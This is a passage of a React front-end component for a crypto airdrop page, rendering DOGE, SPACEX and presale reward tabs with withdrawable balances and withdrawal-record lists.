                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} /> BNB
                                            </span>
                                            <div onClick={openNewPagex} className='w-3/12 flex flex-row items-center justify-center'>
                                                <span className=' text-[#24C4E8]'>{item.address}</span>
                                               
                                            </div>
                                        </div>
                                        <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                    </>
                                )
                            }):(
                                
                                <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                        No data
                                </div>
                            )
                        }
                </div>
                {/*  */}

                 {/*  */}
                        <div className="stake-tab-wrap mx-4 mb-2 mt-6">
                            {tabs.map((item, index) => (
                                <div
                                key={index}
                                onClick={() =>{
                                    setTab(index);
                                    if(index ==0){
                                        setCoin("doge")
                                    }else if(index==1){
                                        setCoin("spacex_air")
                                    }else{
                                        // setCoin("bnb")
                                        setCoin("doge_mint")
                                    }
                                } }
                                className={`stake-tab-item flex flex-col ${
                                    tab === index ? "active" : ""
                                }`}
                                >
                                {item}
                                <span className=' text-[9px]'>
                                    {
                                        index == 2?(
                                            
                                           t('g.预售奖励')
                                        ):(
                                            t('g.空投奖励')
                                            
                                        )
                                    }
                                    
                                </span>
                                </div>
                            ))}

                            <div
                                className="stake-tab-indicator"
                                style={{
                                transform: `translateX(${tab * 100}%)`
                                }}
                            />
                            </div>
                        {/*  */}

                {
                    tab==0?(
                        <>
                            <div className=' mx-4 mt-3 airDataBg2  h-[55px] px-4  flex flex-row items-center '>
                                <div className="w-1/2 flex flex-col">
                                    <span className=' text-[10px] text-text2'>{t('g.可提数量')}：
                                        <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={locked}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                         </span>
                                    <span className=' text-[8px] text-gray-400'>{t('air.提取已解锁数量到钱包')}</span>
                                </div>
                                <div className='w-[140px] h-6  ml-2 flex flex-row justify-center items-center'>
                                    <button onClick={_setIsShowTi} className="sci-glow-btn flex flex-row justify-center items-center">
                                        <img className= ' mr-1 '  src={require('../../assets/ipo/dogelogo.png')} style={{"width":"18px"}}></img>
                                        <span>{t('air.提取')}</span>
                                    </button>
                                </div>
                            </div>
                            <div className='recordbg mx-4 h-36 px-4 py-4 mt-3 flex flex-col'>
                                <div className='w-full flex flex-row justify-between items-center'>
                                    <span className='text-text2 text-xs'>{t('air.提取记录')}</span>
                                    <span onClick={()=>setIsShowMenu(true)} className='text-text2 text-[9px]'>{t('air.显示全部')}</span>
                                </div>
                                <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                    <span className='w-3/12'>{t('air.时间')}</span>
                                    <span className='w-2/12'>{t('air.状态')}</span>
                                
                                    <span className='w-4/12 text-center'>DOGE</span>
                                    <span className='w-3/12'>{t('air.单据')}</span>
                                </div>
                                <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                                {
                                        childs.length>0?
                                        childs.slice(0, 3).map((item,index)=>{
                                            return(
                                                <>
                                                    <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                                        <span className='w-3/12'>{item.add_time}</span>
                                                        <span className='w-2/12 text-green-500'>{t('air.已确认')}</span>
                                                        
                                                        <span className='w-4/12 text-center'>
                                                            <NumberFormat
                                                            thousandsGroupStyle="thousand"
                                                            value={item.value}
                                                            prefix=""
                                                            decimalSeparator="."
                                                            displayType="text"
                                                            type="text"
                                                            thousandSeparator={true}
                                                            fixedDecimalScale={true}
                                                            allowNegative={false}
                                                            decimalScale={2} />
                                                        </span>
                                                        <div onClick={openNewPagex} className='w-3/12 flex flex-row items-center justify-start'>
                                                            <span className=' text-[#24C4E8]'>{item.hex}</span>
                                                            <span className='ml-1 text-xs flex flex-row items-center text-text1'><ExportOutlined /></span>
                                                        </div>
                                                    </div>
                                                    <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                                </>
                                            )
                                        }):(
                                            
                                            <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                                    No data
                                            </div>
                                        )
                                    }
                            </div>
                        </>
                    ):tab==1?(
                        <>
                            <div className=' mx-4 mt-3 airDataBg2  h-[55px] px-4  flex flex-row items-center '>
                                <div className="w-1/2 flex flex-col">
                                    <span className=' text-[10px] text-text2'>{t('g.可提数量')}：
                                        <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={spacexAir}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                         </span>
                                    <span className=' text-[8px] text-gray-400'>{t('air.提取邀请推广所得空投奖励')}</span>
                                </div>
                                <div className='w-[140px] h-6  ml-2 flex flex-row justify-center items-center'>
                                    <button onClick={_setIsShowTi} className="sci-glow-btn flex flex-row justify-center items-center">
                                        <img className= ' mr-1 '  src={require('../../assets/ipo/logo1.png')} style={{"width":"18px"}}></img>
                                        <span>{t('air.提取')}</span>
                                    </button>
                                </div>
                            </div>
                            <div className='recordbg mx-4 h-36 px-4 py-4 mt-3 flex flex-col'>
                                <div className='w-full flex flex-row justify-between items-center'>
                                    <span className='text-text2 text-xs'>{t('air.提取记录')}</span>
                                    <span onClick={()=>setIsShowMenu3(true)} className='text-text2 text-[9px]'>{t('air.显示全部')}</span>
                                </div>
                                <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                    <span className='w-3/12'>{t('air.时间')}</span>
                                    <span className='w-2/12'>{t('air.状态')}</span>
                                
                                    <span className='w-4/12 text-center'>SPACEX</span>
                                    <span className='w-3/12'>{t('air.单据')}</span>
                                </div>
                                <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                                {
                                    childs2.length>0?
                                    childs2.slice(0, 3).map((item,index)=>{
                                        return(
                                            <>
                                                <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                                    <span className='w-3/12'>{item.add_time}</span>
                                                    <span className='w-2/12 text-green-500'>{t('air.已确认')}</span>
                                                    
                                                    <span className='w-4/12 text-center'>
                                                        <NumberFormat
                                                        thousandsGroupStyle="thousand"
                                                        value={item.value}
                                                        prefix=""
                                                        decimalSeparator="."
                                                        displayType="text"
                                                        type="text"
                                                        thousandSeparator={true}
                                                        fixedDecimalScale={true}
                                                        allowNegative={false}
                                                        decimalScale={2} />
                                                    </span>
                                                    <div onClick={openNewPagex} className='w-3/12 flex flex-row items-center justify-start'>
                                                        <span className=' text-[#24C4E8]'>{item.hex}</span>
                                                        <span className='ml-1 text-xs flex flex-row items-center text-text1'><ExportOutlined /></span>
                                                    </div>
                                                </div>
                                                <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                            </>
                                        )
                                    }):(
                                        
                                        <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                                No data
                                        </div>
                                    )
                                }
                            </div>
                        </>
                    ):(
                        <>
                            <div className=' mx-4 mt-3 airDataBg2  h-[55px] px-4  flex flex-row items-center '>
                                <div className="w-1/2 flex flex-col">
                                    <span className=' text-[10px] text-text2'>{t('g.可提数量')}：
                                        <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={dogeMint}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                         </span>
                                    <span className=' text-[10px] text-red-400'>{t('g.剩余锁仓数量')}：
                                        <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={dogeMintAll}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                         </span>
                                </div>
                                <div className='w-[140px] h-6  ml-2 flex flex-row justify-center items-center'>
                                    <button onClick={_setIsShowTi} className="sci-glow-btn flex flex-row justify-center items-center">
                                        <img className= ' mr-1 '  src={require('../../assets/ipo/dogelogo.png')} style={{"width":"18px"}}></img>
                                        <span>{t('air.提取')}</span>
                                    </button>
                                </div>
                            </div>
                            <div className='recordbg mx-4 h-36 px-4 py-4 mt-3 flex flex-col'>
                                <div className='w-full flex flex-row justify-between items-center'>
                                    <span className='text-text2 text-xs'>{t('air.提取记录')}</span>
                                    <span onClick={()=>setIsShowMenu1(true)} className='text-text2 text-[9px]'>{t('air.显示全部')}</span>
                                </div>
                                <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                    <span className='w-3/12'>{t('air.时间')}</span>
                                    <span className='w-2/12'>{t('air.状态')}</span>
                                
                                    <span className='w-4/12 text-center'>DOGE</span>
                                    <span className='w-3/12'>{t('air.单据')}</span>
                                </div>
                                <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                                {
                                    childs3.length>0?
                                    childs3.slice(0, 3).map((item,index)=>{
                                        return(
                                            <>
                                                <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                                    <span className='w-3/12'>{item.add_time}</span>
                                                    <span className='w-2/12 text-green-500'>{t('air.已确认')}</span>
                                                    
                                                    <span className='w-4/12 text-center'>
                                                        <NumberFormat
                                                        thousandsGroupStyle="thousand"
                                                        value={item.value}
                                                        prefix=""
                                                        decimalSeparator="."
                                                        displayType="text"
                                                        type="text"
                                                        thousandSeparator={true}
                                                        fixedDecimalScale={true}
                                                        allowNegative={false}
                                                        decimalScale={2} />
                                                    </span>
                                                    <div onClick={openNewPagex} className='w-3/12 flex flex-row items-center justify-start'>
                                                        <span className=' text-[#24C4E8]'>{item.hex}</span>
                                                        <span className='ml-1 text-xs flex flex-row items-center text-text1'><ExportOutlined /></span>
                                                    </div>
                                                </div>
                                                <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                            </>
                                        )
                                    }):(
                                        
                                        <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                                No data
                                        </div>
                                    )
                                }
                            </div>
                        </>
                    )
                }
                
                {/*  */}


                {/*  */}
               

                {/*  */}
               
                {/*  */}
                <div className=' h-[100px]'></div>
            </div>
           
            
               
           <Foot/>
        </>
    );
}

const mapDispatchToProps = (dispatch) =>{
    return{

        setIsLogin(value){
            const action ={type:"setIsLogin",value:value}
            dispatch(action)
        },

        setPAddress(value){
            const action ={type:"setPAddress",value:value}
            dispatch(action)
        },
        setFlash(value){
            const action ={type:"setFlash",value:value}
            dispatch(action)
        }
    }
}
export default connect(mapStateToProps,mapDispatchToProps)(Airdrop);
